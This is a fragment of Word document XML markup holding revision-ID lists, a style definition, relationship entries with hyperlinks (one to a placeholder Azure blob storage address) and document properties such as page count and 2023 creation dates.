    <w:rsid w:val="003C03D7"/>
    <w:rsid w:val="003D0338"/>
    <w:rsid w:val="003D746F"/>
    <w:rsid w:val="003E028C"/>
    <w:rsid w:val="003E19DA"/>
    <w:rsid w:val="00400AE5"/>
    <w:rsid w:val="0040130C"/>
    <w:rsid w:val="00412882"/>
    <w:rsid w:val="00422C1B"/>
    <w:rsid w:val="004453DD"/>
    <w:rsid w:val="00456D96"/>
    <w:rsid w:val="004709F2"/>
    <w:rsid w:val="00474274"/>
    <w:rsid w:val="00475B12"/>
    <w:rsid w:val="00480290"/>
    <w:rsid w:val="004B4EAC"/>
    <w:rsid w:val="004D40B3"/>
    <w:rsid w:val="004D6C2F"/>
    <w:rsid w:val="00510733"/>
    <w:rsid w:val="005159F7"/>
    <w:rsid w:val="00542702"/>
    <w:rsid w:val="0054631F"/>
    <w:rsid w:val="00546E78"/>
    <w:rsid w:val="00551436"/>
    <w:rsid w:val="00552700"/>
    <w:rsid w:val="00557258"/>
    <w:rsid w:val="00557695"/>
    <w:rsid w:val="00561898"/>
    <w:rsid w:val="005758F1"/>
    <w:rsid w:val="00580E51"/>
    <w:rsid w:val="00596070"/>
    <w:rsid w:val="005A6119"/>
    <w:rsid w:val="005C13FC"/>
    <w:rsid w:val="005E1048"/>
    <w:rsid w:val="00606A5B"/>
    <w:rsid w:val="006168E2"/>
    <w:rsid w:val="006206C8"/>
    <w:rsid w:val="00640FA5"/>
    <w:rsid w:val="0064135C"/>
    <w:rsid w:val="00653DBF"/>
    <w:rsid w:val="00660813"/>
    <w:rsid w:val="00675655"/>
    <w:rsid w:val="00693ADE"/>
    <w:rsid w:val="0069793F"/>
    <w:rsid w:val="006B3066"/>
    <w:rsid w:val="006B5B52"/>
    <w:rsid w:val="006C49CE"/>
    <w:rsid w:val="006D2F28"/>
    <w:rsid w:val="006D5CB8"/>
    <w:rsid w:val="006D7029"/>
    <w:rsid w:val="006F3262"/>
    <w:rsid w:val="006F5A04"/>
    <w:rsid w:val="006F6673"/>
    <w:rsid w:val="00703C67"/>
    <w:rsid w:val="007127A3"/>
    <w:rsid w:val="00724E07"/>
    <w:rsid w:val="00756159"/>
    <w:rsid w:val="007563C3"/>
    <w:rsid w:val="00762139"/>
    <w:rsid w:val="00763158"/>
    <w:rsid w:val="007725BA"/>
    <w:rsid w:val="00772FDA"/>
    <w:rsid w:val="0077565B"/>
    <w:rsid w:val="0078653F"/>
    <w:rsid w:val="007B01D5"/>
    <w:rsid w:val="007B1E21"/>
    <w:rsid w:val="007B2148"/>
    <w:rsid w:val="007C7FA8"/>
    <w:rsid w:val="007E0C6E"/>
    <w:rsid w:val="007E653E"/>
    <w:rsid w:val="007E6D76"/>
    <w:rsid w:val="007E6E57"/>
    <w:rsid w:val="007F7C68"/>
    <w:rsid w:val="008058F2"/>
    <w:rsid w:val="00810748"/>
    <w:rsid w:val="008142F2"/>
    <w:rsid w:val="008416D3"/>
    <w:rsid w:val="0084599D"/>
    <w:rsid w:val="008540B1"/>
    <w:rsid w:val="008632D8"/>
    <w:rsid w:val="008653E2"/>
    <w:rsid w:val="0087079C"/>
    <w:rsid w:val="00873994"/>
    <w:rsid w:val="00892555"/>
    <w:rsid w:val="008B45D1"/>
    <w:rsid w:val="008B62FE"/>
    <w:rsid w:val="008C078C"/>
    <w:rsid w:val="008C18CF"/>
    <w:rsid w:val="008C6E66"/>
    <w:rsid w:val="008D5A2D"/>
    <w:rsid w:val="008E274D"/>
    <w:rsid w:val="008E2EE0"/>
    <w:rsid w:val="008E49D5"/>
    <w:rsid w:val="008E5783"/>
    <w:rsid w:val="00906ACB"/>
    <w:rsid w:val="0093480F"/>
    <w:rsid w:val="009408F6"/>
    <w:rsid w:val="00947C61"/>
    <w:rsid w:val="00960C6F"/>
    <w:rsid w:val="00994D0F"/>
    <w:rsid w:val="0099543F"/>
    <w:rsid w:val="009956E1"/>
    <w:rsid w:val="009B583F"/>
    <w:rsid w:val="009C3261"/>
    <w:rsid w:val="009D33DB"/>
    <w:rsid w:val="00A038CA"/>
    <w:rsid w:val="00A130E1"/>
    <w:rsid w:val="00A1749D"/>
    <w:rsid w:val="00A34115"/>
    <w:rsid w:val="00A55FAA"/>
    <w:rsid w:val="00A7215C"/>
    <w:rsid w:val="00A73B19"/>
    <w:rsid w:val="00AC7023"/>
    <w:rsid w:val="00AE14D8"/>
    <w:rsid w:val="00AE155D"/>
    <w:rsid w:val="00AE4150"/>
    <w:rsid w:val="00AF048C"/>
    <w:rsid w:val="00AF18DD"/>
    <w:rsid w:val="00AF222E"/>
    <w:rsid w:val="00B110BA"/>
    <w:rsid w:val="00B168E9"/>
    <w:rsid w:val="00B35841"/>
    <w:rsid w:val="00B621F4"/>
    <w:rsid w:val="00B622F8"/>
    <w:rsid w:val="00B70142"/>
    <w:rsid w:val="00B7479B"/>
    <w:rsid w:val="00B7716E"/>
    <w:rsid w:val="00B91786"/>
    <w:rsid w:val="00BA3BB4"/>
    <w:rsid w:val="00BA5F25"/>
    <w:rsid w:val="00BE48E4"/>
    <w:rsid w:val="00C009C8"/>
    <w:rsid w:val="00C076D8"/>
    <w:rsid w:val="00C2706D"/>
    <w:rsid w:val="00C33E52"/>
    <w:rsid w:val="00C479EE"/>
    <w:rsid w:val="00C656F8"/>
    <w:rsid w:val="00C86AD5"/>
    <w:rsid w:val="00CE5136"/>
    <w:rsid w:val="00D01E1A"/>
    <w:rsid w:val="00D26A1B"/>
    <w:rsid w:val="00D32187"/>
    <w:rsid w:val="00D37EC4"/>
    <w:rsid w:val="00D40E3C"/>
    <w:rsid w:val="00D50A91"/>
    <w:rsid w:val="00D635DF"/>
    <w:rsid w:val="00D713AA"/>
    <w:rsid w:val="00D76BFE"/>
    <w:rsid w:val="00D83D68"/>
    <w:rsid w:val="00D91354"/>
    <w:rsid w:val="00DB7BB4"/>
    <w:rsid w:val="00DC1EFC"/>
    <w:rsid w:val="00DD15F3"/>
    <w:rsid w:val="00DE1DB0"/>
    <w:rsid w:val="00DE7794"/>
    <w:rsid w:val="00E05502"/>
    <w:rsid w:val="00E1037D"/>
    <w:rsid w:val="00E563CB"/>
    <w:rsid w:val="00E62C87"/>
    <w:rsid w:val="00E83F1C"/>
    <w:rsid w:val="00E96F97"/>
    <w:rsid w:val="00EB096B"/>
    <w:rsid w:val="00EB51CC"/>
    <w:rsid w:val="00EC396B"/>
    <w:rsid w:val="00EE0D6D"/>
    <w:rsid w:val="00F03E46"/>
    <w:rsid w:val="00F070C2"/>
    <w:rsid w:val="00F246F6"/>
    <w:rsid w:val="00F50664"/>
    <w:rsid w:val="00F73F3C"/>
    <w:rsid w:val="00F82307"/>
    <w:rsid w:val="00F905DA"/>
    <w:rsid w:val="00F96D08"/>
    <w:rsid w:val="00FA2558"/>
    <w:rsid w:val="00FA3AD7"/>
    <w:rsid w:val="00FA485B"/>
    <w:rsid w:val="00FC3F99"/>
    <w:rsid w:val="00FD5044"/>
    <w:rsid w:val="00FE2116"/>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 w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0075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NAME.blob.core.windows.net/CONTAINERNAME" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityspa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xlek.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32</Pages>
  <Words>12620</Words>
  <Characters>71937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21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T19:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-24T03:25:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>